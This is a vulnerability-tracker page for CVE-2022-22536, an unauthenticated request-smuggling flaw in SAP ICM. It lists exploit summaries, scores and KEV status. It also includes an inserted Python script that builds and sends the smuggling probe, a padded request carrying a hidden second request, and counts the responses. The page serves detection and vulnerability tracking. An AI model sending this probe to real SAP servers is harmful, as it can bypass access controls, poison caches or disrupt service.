CVE-2022-22536

CRITICAL KEV NUCLEI

SAP ICM (NetWeaver AS ABAP/Java, ABAP Platform, Web Dispatcher, Content Server 7.53) - Unauthenticated HTTP Request Smuggling via Memory Pipes Desynchronization

Title source: llm

Exploitation Summary

CVE-2022-22536 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added August 18, 2022. EIP tracks 8 public exploits from researchers including C41Tx90, ZZ-SOCMAP, tess-ss. A Nuclei detection template is also available.

AI-analyzed exploit summary (exploit-db 52109): This exploit demonstrates HTTP request smuggling (CVE-2022-22536) in SAP NetWeaver by crafting a request with a mismatched Content-Length header to bypass ACLs and reach internal endpoints. It includes a Python script that automates the attack and tests multiple paths for the vulnerability.

Description

SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation. An unauthenticated attacker can prepend arbitrary data to a victim's request. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of confidentiality, integrity and availability of the system.
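The following is an added example, not code from any of the repositories listed on this page. It ties the description above to the indicator the PoC and scanner entries below rely on: one HTTP/1.1 request whose Content-Length covers a large padding block plus a complete embedded second request, and a response-stream parser that counts complete HTTP responses by consuming each body according to its framing, so that a body which merely contains the text "HTTP/1.1 200 OK" is not miscounted as a second response. The padding size, the request paths, the port and the host name are assumptions; the sample response streams are constructed, not captured from any real system.

```python
"""Probe builder and multi-response detector for the SAP ICM memory-pipes
request smuggling class (CVE-2022-22536). Added example; assumptions inline."""
from __future__ import annotations
import re
import socket

# Assumption: padding must exceed the ICM memory-pipe buffer. Public PoCs use
# bodies of tens of kilobytes; 70000 is a placeholder, not a documented value.
DEFAULT_PADDING = 70_000
_STATUS_LINE = re.compile(rb"^HTTP/1\.[01] (\d{3})\b")


def build_probe(host: str, path: str = "/", smuggled_path: str = "/",
                padding_len: int = DEFAULT_PADDING) -> bytes:
    """One request whose Content-Length covers a padding block plus a complete
    second request. A server that frames the body correctly answers once; an
    ICM that desynchronises its memory pipe also processes the embedded request
    and answers twice. Host and paths are placeholders."""
    smuggled = f"GET {smuggled_path} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()
    body = b"A" * padding_len + smuggled
    head = (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Length: {len(body)}\r\nConnection: keep-alive\r\n\r\n").encode()
    return head + body


def _read_chunked(raw: bytes, pos: int) -> tuple[bytes, int]:
    """Consume a chunked body starting at pos; return (body, position after it)."""
    body = b""
    while True:
        nl = raw.find(b"\r\n", pos)
        if nl < 0:
            return body, len(raw)
        size = int(raw[pos:nl].split(b";")[0] or b"0", 16)
        pos = nl + 2
        if size == 0:  # last chunk: skip optional trailers up to the blank line
            while True:
                nl = raw.find(b"\r\n", pos)
                if nl < 0:
                    return body, len(raw)
                if nl == pos:
                    return body, pos + 2
                pos = nl + 2
        body += raw[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF


def split_responses(raw: bytes) -> list[tuple[int, bytes]]:
    """Split a raw stream into (status, body) pairs, consuming each body by its
    framing (Content-Length, chunked, or to end of stream), so a body that merely
    contains the text 'HTTP/1.1 200 OK' is not miscounted as a second response."""
    out: list[tuple[int, bytes]] = []
    pos = 0
    while pos < len(raw):
        end = raw.find(b"\r\n\r\n", pos)
        m = _STATUS_LINE.match(raw[pos:end]) if end >= 0 else None
        if not m:
            break  # truncated or not at a message boundary: stop, do not guess
        status = int(m.group(1))
        headers = {}
        for line in raw[pos:end].split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        body_start = end + 4
        if b"chunked" in headers.get(b"transfer-encoding", b"").lower():
            body, pos = _read_chunked(raw, body_start)
        elif b"content-length" in headers:
            n = int(headers[b"content-length"])
            body, pos = raw[body_start:body_start + n], body_start + n
        elif status in (204, 304) or status < 200:
            body, pos = b"", body_start
        else:
            body, pos = raw[body_start:], len(raw)  # delimited by connection close
        out.append((status, body))
    return out


def looks_desynced(raw: bytes) -> bool:
    """Two or more complete responses to one request is the indicator the
    PoCs and scanners listed for this CVE count."""
    return len(split_responses(raw)) >= 2


def probe(host: str, port: int = 8000, timeout: float = 10.0, **kw) -> list[tuple[int, bytes]]:
    """Send the probe over a plain socket and parse whatever comes back.
    Network call; port 8000 is an assumed ICM HTTP port, not a documented one."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host, **kw))
        try:
            while data := s.recv(65536):
                chunks.append(data)
        except socket.timeout:
            pass  # keep-alive peer went quiet; parse what arrived
    return split_responses(b"".join(chunks))


# Constructed sample streams (not captured from any real system).
SAMPLE_BODY = b"body text that mentions HTTP/1.1 200 OK\r\n"
ONE_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n" % len(SAMPLE_BODY) + SAMPLE_BODY
TWO_RESPONSES = (b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"
                 b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
                 b"5\r\nhello\r\n0\r\n\r\n")

if __name__ == "__main__":
    print("naive:", ONE_RESPONSE.count(b"HTTP/1.1"), "framed:", len(split_responses(ONE_RESPONSE)))
    print("desync indicator on two-response sample:", looks_desynced(TWO_RESPONSES))
```

Against a live host, `looks_desynced(b"".join(...))` or `len(probe(host)) >= 2` is the check; a patched ICM treats the whole body as opaque data and returns exactly one response. The framed parser matters because a naive `count(b"HTTP/1.1")` on the one-response sample reports two messages, and a scanner built on that would produce false positives on any page whose body echoes a status line. Response bodies are returned alongside status codes so that the second response can be inspected rather than merely counted.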

Exploits (8)

exploitdb WORKING POC
by C41Tx90 · text · remote · multiple
https://www.exploit-db.com/exploits/52109

This exploit demonstrates HTTP request smuggling (CVE-2022-22536) in SAP NetWeaver by crafting a malicious request with a mismatched Content-Length header to bypass ACLs and access internal endpoints. It includes a Python script to automate the attack and test multiple paths for vulnerability.

Classification: Working PoC (95%)
Attack Type: Auth Bypass
Complexity: Moderate
Reliability: Reliable
Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher
Authentication: none required
Prerequisites: Network access to the SAP NetWeaver server · SAP NetWeaver with vulnerable configuration
Analyzed by devstral-2, Feb 16, 2026
nomisec WORKING POC 51 stars
by ZZ-SOCMAP · poc
https://github.com/ZZ-SOCMAP/CVE-2022-22536

This PoC targets CVE-2022-22536 in SAP Internet Communication Manager (ICM), a request smuggling vulnerability that this entry classifies as DoS, using a crafted HTTP request with excessive padding. It checks for the vulnerability by sending the malformed request and analyzing the response count and status codes.

Classification: Working PoC (95%)
Attack Type: DoS
Complexity: Moderate
Reliability: Reliable
Target: SAP Internet Communication Manager (ICM)
Authentication: none required
Prerequisites: Network access to the target SAP ICM server
Analyzed by devstral-2, Feb 16, 2026
nomisec WORKING POC 10 stars
by tess-ss · poc
https://github.com/tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536

This repository provides a proof-of-concept for CVE-2022-22536, a request smuggling vulnerability in SAP NetWeaver and related products. The exploit leverages HTTP desynchronization to poison intermediary caches, potentially leading to credential theft or unauthorized actions.

Classification: Working PoC (90%)
Attack Type: Other
Complexity: Moderate
Reliability: Reliable
Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher
Authentication: none required
Prerequisites: Network access to the target SAP system · Intermediary proxy vulnerable to desynchronization
Analyzed by devstral-2, Feb 16, 2026
nomisec WORKING POC 1 stars
by BecodoExploit-mrCAT · infoleak
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit

This repository contains a functional Python-based proof-of-concept exploit for CVE-2022-22536, demonstrating HTTP request smuggling in SAP NetWeaver Application Server. The exploit leverages Content-Length manipulation to bypass access controls and access internal endpoints.

Classification: Working PoC (95%)
Attack Type: Auth Bypass
Complexity: Moderate
Reliability: Reliable
Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher
Authentication: none required
Prerequisites: Network access to the target SAP NetWeaver instance · Knowledge of internal SAP endpoints to target
Analyzed by devstral-2, Feb 16, 2026
nomisec SCANNER
by abrewer251 · infoleak
https://github.com/abrewer251/CVE-2022-22536_SAP_Request_Smuggling_Scanner

This repository contains a Python-based scanner for CVE-2022-22536, a critical request smuggling vulnerability in SAP Internet Communication Manager (ICM) and SAP Web Dispatcher. The scanner tests multiple hosts in parallel for protocol desynchronization behavior by sending crafted HTTP requests and analyzing responses.

Classification: Scanner (95%)
Attack Type: Other
Complexity: Moderate
Reliability: Reliable
Target: SAP Internet Communication Manager (ICM) and SAP Web Dispatcher
Authentication: none required
Prerequisites: List of target IPs/ports · Network access to target systems
Analyzed by devstral-2, Feb 16, 2026
inthewild WRITEUP
poc
https://github.com/tes5hacks/sap-memory-pipes-desynchronization-vulnerability-mpi-cve-2022-22536

The repository provides a detailed technical explanation of CVE-2022-22536, a request smuggling vulnerability in SAP NetWeaver and related components. It includes a proof-of-concept HTTP request demonstrating the desynchronization attack but lacks functional exploit code.

Classification: Writeup (90%)
Attack Type: Other
Complexity: Moderate
Reliability: Theoretical
Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher
Authentication: none required
Prerequisites: Network access to the vulnerable SAP server · Intermediary proxy vulnerable to desynchronization
Analyzed by devstral-2, Feb 23, 2026
inthewild WORKING POC
poc
https://github.com/asurti6783/sap-memory-pipes-desynchronization-vulnerability-mpi-cve-2022-22536

This repository provides a functional proof-of-concept for CVE-2022-22536, demonstrating request smuggling and cache poisoning in SAP NetWeaver via desynchronization of memory pipes. The PoC includes a crafted HTTP request with a large Content-Length header to exploit the vulnerability.

Classification: Working PoC (90%)
Attack Type: Other
Complexity: Moderate
Reliability: Reliable
Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher
Authentication: none required
Prerequisites: Access to the target SAP server · Ability to send crafted HTTP requests
Analyzed by devstral-2, Feb 23, 2026
inthewild WORKING POC
poc
https://github.com/antx-code/cve-2022-22536

This repository contains a functional PoC for CVE-2022-22536 that the analysis attributes to SAP NetWeaver AS JAVA (LM Configuration Wizard); that component is not among the affected products in the SAP description above, which lists the ICM-based servers (AS ABAP/Java, ABAP Platform, Web Dispatcher, Content Server), so read the target line below as the repository's framing rather than the advisory's. The exploit crafts a malformed HTTP request with excessive padding to trigger a DoS condition, causing the server to respond with multiple HTTP responses.

Classification: Working PoC (95%)
Attack Type: DoS
Complexity: Moderate
Reliability: Reliable
Target: SAP NetWeaver AS JAVA (LM Configuration Wizard) versions 7.30, 7.31, 7.40, 7.50
Authentication: none required
Prerequisites: Network access to the target SAP server · Target server must be running a vulnerable version of SAP NetWeaver AS JAVA
Analyzed by devstral-2, Feb 23, 2026

Nuclei Templates (1)

SAP Memory Pipes (MPI) Desynchronization
CRITICAL · by pdteam
Shodan: http.favicon.hash:-266008933
FOFA: icon_hash=-266008933

References (3)

Core References
https://launchpad.support.sap.com/#/notes/3123396 (SAP Note 3123396; tags: Permissions Required, x_refsource_misc)
https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html (tags: Vendor Advisory, Broken Link, Not Applicable, x_refsource_misc)

Scores

CVSS v3.1: 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
EPSS: 0.9383 (99.9th percentile)
Attack Vector: NETWORK

CISA SSVC

Vulnrichment
Exploitation active
Automatable yes
Technical Impact total

Details

CISA KEV 2022-08-18
VulnCheck KEV 2022-08-18
InTheWild.io 2022-08-18
ENISA EUVD EUVD-2022-27682
CWE
CWE-444
Status published
Products (26)
sap/content_server 7.53
sap/netweaver_application_server_abap 7.22
sap/netweaver_application_server_abap 7.49
sap/netweaver_application_server_abap 7.53
sap/netweaver_application_server_abap 7.77
sap/netweaver_application_server_abap 7.81
sap/netweaver_application_server_abap 7.85
sap/netweaver_application_server_abap 7.86
sap/netweaver_application_server_abap 7.87
sap/netweaver_application_server_abap 8.04
... and 16 more
Published Feb 09, 2022
KEV Added Aug 18, 2022
Tracked Since Feb 18, 2026